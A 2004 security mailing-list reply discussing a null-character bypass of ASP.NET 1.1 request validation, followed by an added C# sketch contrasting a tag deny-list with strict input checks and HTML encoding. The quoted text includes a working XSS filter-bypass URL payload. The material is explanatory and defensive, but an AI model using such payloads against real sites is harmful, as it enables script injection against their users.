RE: Pen-tester's analysis of .NET security?

From: Frank Knobbe (frank_at_knobbe.us)
Date: 03/26/04

  • Next message: Dinis Cruz: "RE: Pen-tester's analysis of .NET security?"
    To: Dominick Baier <db@die-lounge.com>
    Date: Fri, 26 Mar 2004 15:54:26 -0600
    
    
    

    On Fri, 2004-03-26 at 02:29, Dominick Baier wrote:
    > however there is a bug in asp.net 1.1 with null characters :
    >
    > won't work
    > http://foo.bar/search.aspx?term=>alert('Vulnerable')</SCRIPT>
    >
    > will work
    >
    > http://foo.bar/search.aspx?term=<%00SCRIPT>alert('Vulnerable')</SCRIPT>

    What did I say earlier about not trusting the OS? Perfect example here.
    You can't trust anybody but your own code :)

    Any idea why Microsoft is filtering for "<SCRIPT>" specifically and not
    just "<" and ">"?

    Regards,
    Frank
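
Added example (not part of the original thread, and not Microsoft's request-validation code): a C# console sketch of why a filter keyed to a specific tag string misses the null-character variant quoted above, next to a strict input check and HTML encoding at output. The `PassesTagDenyList` filter, the class name and the sample inputs are hypothetical and constructed for illustration.

```csharp
using System;
using System.Net;

static class RequestFilterDemo
{
    // Hypothetical deny-list: rejects only values containing "<script".
    // Constructed for illustration; not the ASP.NET implementation.
    public static bool PassesTagDenyList(string value) =>
        value.IndexOf("<script", StringComparison.OrdinalIgnoreCase) < 0;

    // Strict input check: refuse control characters (including U+0000)
    // and both angle brackets, whatever follows them.
    public static bool PassesStrictCheck(string value)
    {
        foreach (char c in value)
            if (char.IsControl(c) || c == '<' || c == '>') return false;
        return true;
    }

    // Output encoding: applied where the value is written into HTML,
    // so it holds even when an input filter has been bypassed.
    public static string Render(string term) =>
        "<p>Results for: " + WebUtility.HtmlEncode(term) + "</p>";

    static void Main()
    {
        // Constructed sample inputs modelled on the two cases in the
        // thread, plus one benign search term.
        string[] rawQueryValues =
        {
            "<SCRIPT>alert('Vulnerable')</SCRIPT>",
            "<%00SCRIPT>alert('Vulnerable')</SCRIPT>",
            "asp.net forms"
        };

        foreach (string raw in rawQueryValues)
        {
            string term = WebUtility.UrlDecode(raw); // %00 becomes U+0000
            Console.WriteLine("denyList={0,-5} strict={1,-5} {2}",
                PassesTagDenyList(term),
                PassesStrictCheck(term),
                Render(term).Replace("\0", "\\0")); // make NUL visible
        }
    }
}
```

The second input passes the tag deny-list because the decoded null character separates "<" from "SCRIPT", while the strict check rejects it and the rendered output carries the brackets only as `&lt;` and `&gt;`.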

    
    


